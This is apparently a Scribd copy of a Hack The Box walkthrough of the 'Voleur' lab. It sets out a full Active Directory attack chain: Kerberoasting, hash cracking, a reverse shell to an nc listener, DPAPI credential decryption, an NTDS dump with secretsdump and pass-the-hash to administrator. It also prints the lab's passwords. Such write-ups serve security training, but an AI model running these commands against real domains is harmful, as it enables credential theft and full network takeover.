Scribd
Upload
5K views1 page

Voleur HTB Writeup and Walkthrough

The document outlines a penetration testing process on the Voleur box, detailing the use of Kerberos authentication to access various resources and extract sensitive information. Key steps include generating Kerberos tickets, accessing SMB shares, cracking password hashes, and restoring deleted Active Directory users. The process culminates in obtaining both user and root flags through various attacks and exploitation techniques.

Uploaded by

Ivo Ponso
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
5K views1 page

Voleur HTB Writeup and Walkthrough

The document outlines a penetration testing process on the Voleur box, detailing the use of Kerberos authentication to access various resources and extract sensitive information. Key steps include generating Kerberos tickets, accessing SMB shares, cracking password hashes, and restoring deleted Active Directory users. The process culminates in obtaining both user and root flags through various attacks and exploitation techniques.

Uploaded by

Ivo Ponso
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Voleur

Voleur

IP

[Link]

Domain/Hosts

[Link] [Link]

/etc/krb5conf

default_realm = [Link]
dns_lookup_realm = false
dns_lookup_kdc = false
ticket_lifetime = 24h
renew_lifetime = 7d
forwardable = true

[realms]
[Link] = {
kdc = [Link]
admin_server = [Link]
default_domain = [Link]
}

[domain_realm]
.[Link] = [Link]
[Link] = [Link]

Info

As is common in real life Windows pentests, you will start the Voleur box with credentials for the
following account: [Link] / HollowOct31Nyt

Nmap Results

SMB Enumeartion
We generate a Kerberos TGT for user Ryan Naylor using netexec with password authentication

netexec smb [Link] -u [Link] -p 'HollowOct31Nyt' -k --generate-tgt [Link]

We set the Kerberos ticket cache environment variable to use Ryan Naylor’s TGT

export KRB5CCNAME=[Link]

We verify the current Kerberos ticket

klist

We list available SMB shares on [Link] using netexec with Kerberos authentication

netexec smb [Link] -u [Link] -p 'HollowOct31Nyt' -k --shares

Whe got some interessting Shares

We connect to [Link] using [Link] with Kerberos ticket authentication

KRB5CCNAME=[Link] [Link] -k [Link]

use IT
cd First-Line Support
get Access_Review.xlsx

Creds in Access_Review.xls

Warning

The Access_Review.xlsx file is protected with a password

We extract the password hash from Access_Review.xlsx using office2john and save it to [Link]

office2john Access_Review.xlsx >> [Link]

**We crack the extracted password hash

john --wordlist=/usr/share/wordlists/[Link] [Link]

football1 (Access_Review.xlsx) ✅

We create a Python virtual environment, install msoffcrypto-tool

python3 -m venv venv


source venv/bin/activate
pip install msoffcrypto-tool

cd /mnt/NASDF017E/#Kali/HTB/Voleur_HTB

python3 -m msoffcrypto -p football1 Access_Review.xlsx entschluesselt_Access_Review.xlsx

I was open the Sheat in [Link] (because no tool installed for View xlsx files ) 😁

🔐 ServiceAccounts Passwords in Access_Review.xls

User Password

svc_ldap M1XyC9pW7qT5Vn

svc_iis N5pXyV1WqM7CZ8

Important

We obtain a hint that the deleted user [Link] had the password NightT1meP1dg3on14

Attack Chain
We run bloodhound-python with Ryan Naylor's credentials to collect all Active Directory data from
the [Link] domain, using Kerberos and outputting a zipped report

bloodhound-python -u [Link] -p 'HollowOct31Nyt' -c All -d [Link] -ns [Link]


--zip -k

➡️ svc_ldap have GenericWrite on [Link] and WriteSPN on svc_winrm

We generate a Kerberos TGT for svc_ldap on [Link] using netexec with password
authentication

netexec smb [Link] -u svc_ldap -p 'M1XyC9pW7qT5Vn' -k --generate-tgt svc_ldap

We set the Kerberos ticket cache environment variable to use svc_ldap’s TGT

export KRB5CCNAME=svc_ldap.ccache

We perform a targeted Kerberoast attack using the svc_ldap account with Kerberos authentication
against [Link]

[Link] -k --dc-host [Link] -u svc_ldap -d [Link]

We crack Kerberos password hashes using John the Ripper with the RockYou wordlist

john --wordlist=/usr/share/wordlists/[Link] hashes_kerberos.txt

Just the hash from svc_winrm can be cracked

We generate a Kerberos TGT for svc_winrm on [Link] using netexec with password
authentication

netexec smb [Link] -u svc_winrm -p 'AFireInsidedeOzarctica980219afi' -k --generate-tgt


svc_winrm

We set the Kerberos ticket cache environment variable to use svc_winrm’s TGT

export KRB5CCNAME=svc_winrm.ccache

We connect to [Link] using evil-winrm with Kerberos authentication as svc_winrm

evil-winrm -i [Link] -k -u svc_winrm -r [Link]

User Flag 🏁
We got the User Flag

type C:\Users\svc_winrm\Desktop\[Link]

Restore User [Link]


svc_ldap is in the RESTORE_USERS Group so i think him can restore the User [Link]

We create a tools directory on the target and upload [Link] to it

mkdir C:\tools
cd C:\tools

upload [Link]

Start a listener

nc -lvnp 4444

.\[Link] svc_ldap M1XyC9pW7qT5Vn [Link] -r [Link]

Whe got a Shell als svc_ldap

Switch to Powershell

powershell

**We query Active Directory for all deleted user objects , retrieving their ObjectGUIDs, SIDs, and last
known parent OUs

Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjects
-Properties objectSid, lastKnownParent, ObjectGUID | Select-Object Name, ObjectGUID,
objectSid, lastKnownParent | Format-List

We restore the deleted Active Directory object with the specified ObjectGUID

Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db'

Whe comfirm that [Link] are back

net user /domain

IT Share second-line
We generate a Kerberos TGT for [Link] on [Link] using netexec with password
authentication

netexec smb [Link] -u [Link] -p 'NightT1meP1dg3on14' -k --generate-tgt [Link]

We set the Kerberos ticket cache environment variable to use [Link]’s TGT

export KRB5CCNAME=[Link]

We connect to [Link] using [Link] with Kerberos ticket authentication for


[Link]

KRB5CCNAME=[Link] [Link] -k [Link]

We download credential and DPAPI masterkey files from Todd Wolfe's archived user profile via
SMB

mget /Second-Line Support/Archived


Users/[Link]/AppData/Roaming/Microsoft/Credentials/772275FAD58525253490A9B0039791D3

mget /Second-Line Support/Archived Users/[Link]/AppData/Roaming/Microsoft/Protect/S-1-5-


21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88

We decrypt Todd Wolfe’s DPAPI masterkey file using [Link] with his SID and password

[Link] masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-


1337352550-2781715495-1110 -password NightT1meP1dg3on14

We decrypt Todd Wolfe’s DPAPI credential file using [Link] with the extracted masterkey

[Link] credential -file 772275FAD58525253490A9B0039791D3 -key


0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e2
40ce2b8a9dfb92a0d15969ccae6f550650a83

Username : [Link]
Unknown : qT3V9pLXyN7W4m

IT Share Third-Line
We generate a Kerberos TGT for [Link] on [Link] using netexec with password
authentication

netexec smb [Link] -u [Link] -p 'qT3V9pLXyN7W4m' -k --generate-tgt [Link]

We set the Kerberos ticket cache environment variable to use `[Link]'s` TGT**

export KRB5CCNAME=[Link]

We connect to [Link] using [Link] with Kerberos ticket authentication for


[Link]

KRB5CCNAME=[Link] [Link] -k [Link]

We download the id_rsa private SSH key and the [Link] file from the "Third-Line Support" SMB
share directory

mget /Third-Line Support/id_rsa


mget /Third-Line Support/[Link]

SSH Shell as svc_backup


[Link]

The Admin is frustrated with Windows Backup and has partially configured WSL (Windows
Subsystem for Linux) to explore using Linux-based backup tools instead. They asked Jeremy to set
it up further.

Since this is about backup jobs , we will test SSH access using the svc_backup account.

We set strict permissions on the id_rsa SSH private key file using chmod 600

chmod 600 id_rsa

We connect via SSH to [Link] as svc_backup on port 2222 using the downloaded id_rsa
private key

ssh svc_backup@[Link] -p 2222 -i id_rsa

We list the contents of the Active Directory and registry backup folders within the Third-Line Support
Backups directory
(While connected as [Link] , the folder was not visible due to permission restrictions)

ls '/mnt/c/IT/Third-Line Support/Backups/Active Directory'


ls '/mnt/c/IT/Third-Line Support/Backups/registry'

We securely copy all files from the Active Directory and registry backup directories on [Link]
to the local machine using SCP with the id_rsa key on port 2222

scp -P 2222 -i id_rsa svc_backup@[Link]:/mnt/c/IT/Third-Line\ Support/Backups/Active\


Directory/* ./ && \

scp -P 2222 -i id_rsa svc_backup@[Link]:/mnt/c/IT/Third-Line\ Support/Backups/registry/*


./

NTDS Attack
We extract Active Directory user hashes from the local SYSTEM and [Link] files using
[Link]

[Link] -system SYSTEM -ntds [Link] LOCAL

We request a Kerberos TGT for the administrator account in [Link] using the NTLM hash with
[Link]

[Link] -hashes :e656e07c56d831611bxxxxxb259ad2 -dc-ip [Link]


[Link]/administrator

We set the Kerberos ticket cache environment variable to use the administrator’s TGT

export KRB5CCNAME=[Link]

We connect to [Link] using evil-winrm with Kerberos authentication as administrator

evil-winrm -i [Link] -k -u administrator -r [Link]

Root Flag 🏁
Whe got the Root Flag 🏁💪

type C:\Users\Administrator\Desktop\[Link]

By 2ubZ3r0

1/1

You might also like